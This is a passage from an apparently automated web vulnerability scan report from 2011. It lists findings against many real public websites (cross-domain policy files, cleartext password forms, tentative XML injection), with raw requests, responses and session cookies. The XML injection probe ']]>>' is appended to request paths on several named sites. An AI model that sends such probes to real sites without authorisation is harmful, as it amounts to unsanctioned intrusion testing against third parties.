...[SNIP]...
8.19. http://www.xbox.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.xbox.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.xbox.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 25 Mar 2011 02:13:36 GMT
Accept-Ranges: bytes
ETag: "088663f92eacb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:36:21 GMT
Connection: close
Content-Length: 383

...<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="http://*.xbox.com" />
<domain uri="https://*.xbox.com" />
...[SNIP]...
8.20. http://www.kmart.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kmart.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.kmart.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Fri, 17 Sep 2010 03:13:18 GMT
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:28:09 GMT
Content-Length: 1917
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://dfstaging.digitalfolio.com" />
    <domain uri="https://dfstaging.digitalfolio.com" />
    <domain uri="http://dfstaging.cloudapp.net" />
    <domain uri="https://dfstaging.cloudapp.net" />
    <domain uri="http://dfproduction.digitalfolio.com" />
    <domain uri="https://dfproduction.digitalfolio.com" />
    <domain uri="http://dfproduction.cloudapp.net" />
    <domain uri="https://dfproduction.cloudapp.net" />
    <domain uri="http://www.digitalfolio.com" />
    <domain uri="https://www.digitalfolio.com" />
    <domain uri="http://digitalfolio.com" />
    <domain uri="https://digitalfolio.com" />
    <domain uri="http://sears.digitalfolio.com" />
    <domain uri="https://sears.digitalfolio.com" />
    <domain uri="http://mstaging.digitalfolio.com" />
    <domain uri="https://mstaging.digitalfolio.com" />
    <domain uri="http://mstaging.cloudapp.net" />
    <domain uri="https://mstaging.cloudapp.net" />
    <domain uri="http://mproduction.digitalfolio.com" />
    <domain uri="https://mproduction.digitalfolio.com" />
    <domain uri="http://mproduction.cloudapp.net" />
    <domain uri="https://mproduction.cloudapp.net" />
    <domain uri="http://m.digitalfolio.com" />
    <domain uri="https://m.digitalfolio.com" />
    <domain uri="http://sears.m.digitalfolio.com" />
    <domain uri="https://sears.m.digitalfolio.com" />
    <domain uri="http://local.digitalfolio.com:81" />
    <domain uri="http://m.digitalfolio.com:81" />
    <domain uri="http://analytics.digitalfolio.com" />
    <domain uri="https://analytics.digitalfolio.com" />
...[SNIP]...
8.21. http://www.sears.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sears.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.sears.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Fri, 17 Sep 2010 03:13:24 GMT
Content-Type: text/xml
Expires: Sat, 02 Apr 2011 13:23:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:23:34 GMT
Content-Length: 1917
Connection: close
s-srvr:

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://dfstaging.digitalfolio.com" />
    <domain uri="https://dfstaging.digitalfolio.com" />
    <domain uri="http://dfstaging.cloudapp.net" />
    <domain uri="https://dfstaging.cloudapp.net" />
    <domain uri="http://dfproduction.digitalfolio.com" />
    <domain uri="https://dfproduction.digitalfolio.com" />
    <domain uri="http://dfproduction.cloudapp.net" />
    <domain uri="https://dfproduction.cloudapp.net" />
    <domain uri="http://www.digitalfolio.com" />
    <domain uri="https://www.digitalfolio.com" />
    <domain uri="http://digitalfolio.com" />
    <domain uri="https://digitalfolio.com" />
    <domain uri="http://sears.digitalfolio.com" />
    <domain uri="https://sears.digitalfolio.com" />
    <domain uri="http://mstaging.digitalfolio.com" />
    <domain uri="https://mstaging.digitalfolio.com" />
    <domain uri="http://mstaging.cloudapp.net" />
    <domain uri="https://mstaging.cloudapp.net" />
    <domain uri="http://mproduction.digitalfolio.com" />
    <domain uri="https://mproduction.digitalfolio.com" />
    <domain uri="http://mproduction.cloudapp.net" />
    <domain uri="https://mproduction.cloudapp.net" />
    <domain uri="http://m.digitalfolio.com" />
    <domain uri="https://m.digitalfolio.com" />
    <domain uri="http://sears.m.digitalfolio.com" />
    <domain uri="https://sears.m.digitalfolio.com" />
    <domain uri="http://local.digitalfolio.com:81" />
    <domain uri="http://m.digitalfolio.com:81" />
    <domain uri="http://analytics.digitalfolio.com" />
    <domain uri="https://analytics.digitalfolio.com" />
...[SNIP]...
8.22. http://www.usa.gov/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usa.gov
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.usa.gov

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "4e056cd0848e8725c5138c4294450f6f:1279821224"
Last-Modified: Thu, 22 Jul 2010 17:37:45 GMT
Accept-Ranges: bytes
Content-Length: 410
Content-Type: application/xml
Date: Sat, 02 Apr 2011 14:06:11 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="http://prod.usa.gov"/>

...[SNIP]...
9. Cleartext submission of password  previous  next
There are 4 instances of this issue:

9.1. http://www.collegehumor.com/favicon.ico  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:35:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:35:36 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:35:37 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:35:36 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=2aaaf6d3dd05b89fe9a91fb542a542bf37833c97; expires=Fri, 01-Apr-2016 18:39:27 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=2aaaf6d3dd05b89fe9a91fb542a542bf37833c97; expires=Fri, 01-Apr-2016 18:39:27 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
</strong>
               <form id="frm_login" method="post" action="/">
                   <input type="text" class="text" name="login_email" id="login_email" />
                   <input type="password" class="text" name="login_password" id="login_password" />
                   <a href="/user/reset">
...[SNIP]...
9.2. http://www.popularscreensavers.com/favicon.ico  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popularscreensavers.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.popularscreensavers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:45 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Set-Cookie: JSESSIONID=9447E9A291E9E0B405C9506EB438405A; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 100956


                                                                                                                           
...[SNIP]...
</div>
       <form name="changePassword" id="changePassword" action="/registration/ajaxEditPssAccount.jhtml" method="post">
           <input type="hidden" id="userName" name="account.userName" value="" />
...[SNIP]...
</label>
               <input class="inp-text" type="password" name="oldPassword" value="" />
           </div>
...[SNIP]...
</label>
               <input class="inp-text" type="password" name="newPassword" value="" />
           </div>
...[SNIP]...
</label>
               <input class="inp-text" type="password" name="confirmPassword" value="" />
           </div>
...[SNIP]...
9.3. http://www.popularscreensavers.com/favicon.ico  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popularscreensavers.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.popularscreensavers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:45 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Set-Cookie: JSESSIONID=9447E9A291E9E0B405C9506EB438405A; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 100956


                                                                                                                           
...[SNIP]...
</div>
               <form id="loginForm" name="loginForm" method="post" action="/registration/loginAjax.jhtml">
                   <div class="login-email">
...[SNIP]...
<input type="text" name="" class="password-text form-input urchin" data-urchin="login_modal/password" id="modal-password-text" value="Password" />
                   <input type="password" name="loginPassword" class="password form-input" id="modal-password" value="" />
                   
                   </div>
...[SNIP]...
9.4. http://www.popularscreensavers.com/favicon.ico  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popularscreensavers.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.popularscreensavers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:45 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Set-Cookie: JSESSIONID=9447E9A291E9E0B405C9506EB438405A; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 100956


                                                                                                                           
...[SNIP]...
</div>
       <form name="changePassword" id="changePassword" action="/registration/ajaxEditPssAccount.jhtml" method="post">
           <input type="hidden" id="userName" name="account.userName" value="" />
...[SNIP]...
</label>
               <input class="inp-text" type="password" name="oldPassword" value="" />
           </div>
...[SNIP]...
</label>
               <input class="inp-text" type="password" name="newPassword" value="" />
           </div>
...[SNIP]...
</label>
               <input class="inp-text" type="password" name="confirmPassword" value="" />
           </div>
...[SNIP]...
10. XML injection  previous  next
There are 27 instances of this issue:

10.1. http://www.4shared.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.4shared.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4shared.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 /favicon.ico]]&gt;&gt;
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2F3F04A9524AEAD45E0DCD5CDF0568C6.dc328; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 13:25:35 GMT
Content-Length: 41730


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
316&random=0.3651618334396466&sId=ZIEAriQOlNCqNZCa';

var aj = new AjaxHelper();
aj.sendGetXMLRequest(
progressBarUrl,
function(respXML){
var el =respXML.getElementsByTagName("status")[0];
var active = el.getAttribute("active");
if (active=="true"){
var totalContentLengthKbytes = el.getAttribute("totalContentLengthK
...[SNIP]...
10.2. http://www.altervista.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.altervista.org
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.altervista.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:07:00 GMT
Server: Apache
Content-Type: text/html
Content-Length: 2937

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="cref" value="http://tb.altervista.org/cgi-bin/cse_xml.pl/C/www/en" />
...[SNIP]...
10.3. http://www.bathandbodyworks.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.bathandbodyworks.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bathandbodyworks.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:05:58 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=jTy3NXtGltsQzsbmrvGd8KLppvJ2StHsdSwgvLTfny1MLvb1V1Gr!388152377; path=/
Set-Cookie: browser_id=123856780554; expires=Tuesday, 30-Mar-2021 14:05:58 GMT; path=/
Set-Cookie: browser_id=123856780554; expires=Tuesday, 30-Mar-2021 14:05:58 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 112794


<!DOCTYPE html>
<html>
<head>


<!--Preview TimeZone = 'null' --><!--Preview TimeZone = 'America/New_York' --><!-- Checking storemanPD --><!-- Chec
...[SNIP]...
<!-- Do not edit/add css links here. Use the min-cat project. Config file: /ant-min-cat/site-css.xml -->
<link href="http://bbw.imageg.net/min-cat/site-css.xml.min.css" type="text/css" rel="stylesheet" />
...[SNIP]...
10.4. http://www.bizrate.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.bizrate.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bizrate.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: trafficSourceDebugParam=""; Domain=.bizrate.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="NON DSP ADM DEV PSD TAI OUR IND STP PRE NAV UNI"
Set-Cookie: yes_email_invite=invite3; Domain=.bizrate.com; Expires=Sun, 03-Apr-2011 12:45:53 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: sessionid=120412346400107153; Domain=.bizrate.com; Expires=Sun, 03-Apr-2011 12:45:53 GMT; Path=/
Set-Cookie: br=13017483531990811351002040102023819; Domain=.bizrate.com; Expires=Tue, 30-Mar-2021 12:45:53 GMT; Path=/
Set-Cookie: _data=_time%3A%3Astart_time%3D1301748353%3Btimestamp%3D1301748353%7Ctracker%3A%3Ahtcnt%3D1%3Brf%3Dwlk%3Bsearch_cid%3D12060300; Domain=.bizrate.com; Expires=Sun, 03-Apr-2011 12:45:53 GMT; Path=/
Set-Cookie: userzip=0; Domain=.bizrate.com; Expires=Tue, 30-Mar-2021 12:45:53 GMT; Path=/
Set-Cookie: p13n_id=000138125b70d4f44e478d5fd6073ea5ed27; Domain=.bizrate.com; Expires=Tue, 30-Mar-2021 12:45:53 GMT; Path=/
Set-Cookie: rng=6967172; Domain=.bizrate.com; Expires=Sun, 03-Apr-2011 12:45:53 GMT; Path=/
Set-Cookie: sosurvey_response=none%3A%3Afalse%3A%3Afalse%3A%3Ahttp%3A%2F%2Fevalus.bizrate.com%2Fwix%2Fp1648730.aspx%3Fbr%3D13017483531990811351002040102023819%26session_id%3D120412346400107153%26rf_code%3Dwlk%26brand%3DBR%26country_code%3DUS%26pageToken%3D8B%26keyword%3Dfalcon%2Bicon; Domain=.bizrate.com; Expires=Mon, 02-May-2011 12:45:53 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Sat, 02 Apr 2011 12:45:52 GMT
Content-Length: 289099

<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
10.5. http://www.bravotv.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.bravotv.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bravotv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Varnish: 1648302699
Content-Type: text/html; charset=utf-8
X-Drupal-Cache: MISS
Varnish-X-Cache: MISS
ETag: "1301751644-0"
X-PF-Uncompressing: 1
Last-Modified: Sat, 02 Apr 2011 13:40:44 +0000
X-Powered-By: PHP/5.2.8
Content-Length: 26499
Cache-Control: max-age=278
Date: Sat, 02 Apr 2011 13:40:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head
...[SNIP]...
<a href="/sitemap.xml" title="">XML Map</a>
...[SNIP]...
10.6. http://www.columbia.edu/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.columbia.edu
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.columbia.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:17:14 GMT
Server: Apache/2.2.17
Vary: accept-language,accept-charset,Accept-Encoding,User-Agent
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1028

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
10.7. http://www.consumersearch.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.consumersearch.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.consumersearch.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.8 (Unix) PHP/5.2.6 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.6
X-Drupal-Cache: MISS
Last-Modified: Sat, 02 Apr 2011 13:36:26 +0000
ETag: "1301751386-1"
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=1799
Expires: Sat, 02 Apr 2011 14:06:28 GMT
Date: Sat, 02 Apr 2011 13:36:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
version="XHTML+RDFa 1.0"
xmlns:xsd="http://www.w3.org/2001/XMLSchema#"
xmlns:addthis="http://www.addthis.com/help/api-spec"
xmlns:fb="http://www.facebook.com/2008/fbml"
xml:lang="en"
lang="en">
...[SNIP]...
10.8. http://www.dickssportinggoods.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.dickssportinggoods.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dickssportinggoods.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:12 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=WTxZNXlJHncfsfnrTYqCZQ5bqJFGT8M514yz2YJ1h59y0TkjvYtJ!433893400; path=/
Set-Cookie: browser_id=123853471724; expires=Tuesday, 30-Mar-2021 13:34:12 GMT; path=/
Set-Cookie: browser_id=123853471724; expires=Tuesday, 30-Mar-2021 13:34:12 GMT; path=/
Set-Cookie: browser_id=123853471724; expires=Tuesday, 30-Mar-2021 13:34:12 GMT; path=/
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 46106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZone
...[SNIP]...
<!-- Do not edit/add css links here. Use the min-cat project. Config file: /ant-min-cat/site-head-css.xml -->
<link href="http://DSP.imageg.net/min-cat/site-head-css.xml.min.css" type="text/css" rel="stylesheet" />
...[SNIP]...
10.9. http://www.diynetwork.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.diynetwork.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.diynetwork.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix)
Content-Type: text/html
Date: Sat, 02 Apr 2011 14:03:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 100994


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
   <title>DIY 404 Error Page : About Us : DIY Network</title>
   <meta name="description" conten
...[SNIP]...
<!--Endeca request http://searchservices.scrippsnetworks.com/diy/service/mostPopular/mostPopular.xsl/noContentType-0-noContentType-0-10-0.xml -->
...[SNIP]...
10.10. http://www.ehow.co.uk/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.ehow.co.uk
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ehow.co.uk
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Sat, 02 Apr 2011 14:00:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 14:00:49 GMT
Content-Length: 27060
Connection: close


<!DOCTYPE html>
<!--[if IE]><![endif]-->
<html class="Corporate" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
   <head>
               <meta charset="utf-8" />

...[SNIP]...
<a href="http://www.ehow.co.uk/how_5896459_use-sugar-soap-cleaning.html" class="title">How to Use Sugar Soap for Cleaning                
                   </a>
...[SNIP]...
10.11. http://www.examiner.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
